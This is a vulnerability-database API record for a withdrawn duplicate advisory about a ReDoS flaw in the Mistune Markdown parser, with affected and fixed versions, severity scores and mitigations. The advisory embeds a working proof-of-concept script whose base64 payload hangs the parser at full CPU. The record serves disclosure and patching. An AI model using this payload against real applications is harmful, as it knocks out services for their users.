Lookup for vulnerabilities affecting packages.

GET /api/vulnerabilities/347223?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/vulnerabilities/347223?format=api",
    "vulnerability_id": "VCID-sh4a-8vh7-ayb4",
    "summary": "Duplicate Advisory: Mistune has a ReDoS in LINK_TITLE_RE that allows denial of service via crafted Markdown input\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-8mp2-v27r-99xp. This link is maintained to preserve external references.\n\n### Original Description\n\n### Summary\n**Denial-of-Service (DoS)** vulnerability in the Mistune Markdown parser. The issue occurs when processing specially crafted reference links, which can cause excessive parsing and CPU consumption, leading to application hangs.\n\n**Function affected:** parse_link_title() in helpers.py\n**Issue:** Malformed reference links cause excessive backtracking and parsing loops.\n**Impact:** Remote attackers can submit malicious Markdown to hang processes, causing service unavailability.\n\n### Details\n```\nName: mistune\nVersion: 3.2.0\nPython version: Python 3.13.9\nPIP version: pip 25.2\nOS: Kali-linux-VERSION=\"2025.4\"\n```\n\n### PoC\n```\nimport mistune\nimport base64\n\nprint(\"Exploit started....!\")\ndata = base64.b64decode(\n    \"WX5Efn5+RH5+fkRbIVt6XQoKW3q7XTpdOgoifn5+RFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcXFxcflt+RFshW3pdCgpbeg==\"\n)\nmistune.html(data.decode(\"utf-8\", errors=\"ignore\"))\n```\n\n### Reproduce steps:\nSimply execute the above Python script; it will hang and increase CPU utilization to 100%.\n\n**Fuzzer Output (libFuzzer):**\n```\nERROR: libFuzzer: timeout after 3 seconds\nSUMMARY: libFuzzer: timeout\n```\n\n**Stack Trace (Excerpt):**\n```\nmistune/helpers.py:170 in parse_link_title\nmistune/block_parser.py:259 in parse_ref_link\nmistune/core.py:216 in parse_method\nmistune/block_parser.py:458 in parse\nmistune/markdown.py:93 in parse\nmistune/markdown.py:120 in __call__\n```\n### IMAGE POC:\n<img width=\"1194\" height=\"728\" alt=\"POC\" src=\"https://github.com/user-attachments/assets/009e836f-fff7-439e-b0be-6e889bed0077\" />\n\n\n### Impact:\nDenial-of-Service (DoS)\nHigh CPU usage and application hang\nPotential for service unavailability in web apps or APIs processing untrusted Markdown\n\n### Suggested Mitigations:\nImplement parsing depth and iteration limits.\nLimit reference-link title length.\nDetect excessive escape character sequences.\nAdd defensive checks in parse_link_title.\nAdd fuzz regression tests using the provided PoC.\n\nThis vulnerability was discovered using coverage-guided fuzzing and is reproducible consistently.",
    "aliases": [
        {
            "alias": "GHSA-hjph-f4mc-wx4c"
        }
    ],
    "fixed_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/49669?format=api",
            "purl": "pkg:pypi/mistune@3.2.1",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.2.1"
        }
    ],
    "affected_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/49652?format=api",
            "purl": "pkg:pypi/mistune@3.0.0a1",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-dtjf-n7mt-z3ba"
                },
                {
                    "vulnerability": "VCID-q9br-dckr-gkd1"
                },
                {
                    "vulnerability": "VCID-sh4a-8vh7-ayb4"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.0.0a1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/49668?format=api",
            "purl": "pkg:pypi/mistune@3.2.0",
            "is_vulnerable": true,
            "affected_by_vulnerabilities": [
                {
                    "vulnerability": "VCID-8tt4-rc9y-9qgc"
                },
                {
                    "vulnerability": "VCID-atg4-cdz2-cfhe"
                },
                {
                    "vulnerability": "VCID-dtjf-n7mt-z3ba"
                },
                {
                    "vulnerability": "VCID-j8pk-v8t3-ybbu"
                },
                {
                    "vulnerability": "VCID-jpzc-rd9c-vufu"
                },
                {
                    "vulnerability": "VCID-q9br-dckr-gkd1"
                },
                {
                    "vulnerability": "VCID-sh4a-8vh7-ayb4"
                }
            ],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/mistune@3.2.0"
        }
    ],
    "references": [
        {
            "reference_url": "https://github.com/lepture/mistune",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "7.7",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"
                },
                {
                    "value": "HIGH",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/lepture/mistune"
        },
        {
            "reference_url": "https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c",
            "reference_id": "",
            "reference_type": "",
            "scores": [
                {
                    "value": "HIGH",
                    "scoring_system": "cvssv3.1_qr",
                    "scoring_elements": ""
                },
                {
                    "value": "7.7",
                    "scoring_system": "cvssv4",
                    "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"
                },
                {
                    "value": "HIGH",
                    "scoring_system": "generic_textual",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/lepture/mistune/security/advisories/GHSA-hjph-f4mc-wx4c"
        },
        {
            "reference_url": "https://github.com/advisories/GHSA-hjph-f4mc-wx4c",
            "reference_id": "GHSA-hjph-f4mc-wx4c",
            "reference_type": "",
            "scores": [
                {
                    "value": "HIGH",
                    "scoring_system": "cvssv3.1_qr",
                    "scoring_elements": ""
                }
            ],
            "url": "https://github.com/advisories/GHSA-hjph-f4mc-wx4c"
        }
    ],
    "weaknesses": [
        {
            "cwe_id": 400,
            "name": "Uncontrolled Resource Consumption",
            "description": "The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources."
        }
    ],
    "exploits": [],
    "severity_range_score": "7.0 - 8.9",
    "exploitability": null,
    "weighted_severity": null,
    "risk_score": null,
    "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-sh4a-8vh7-ayb4"
}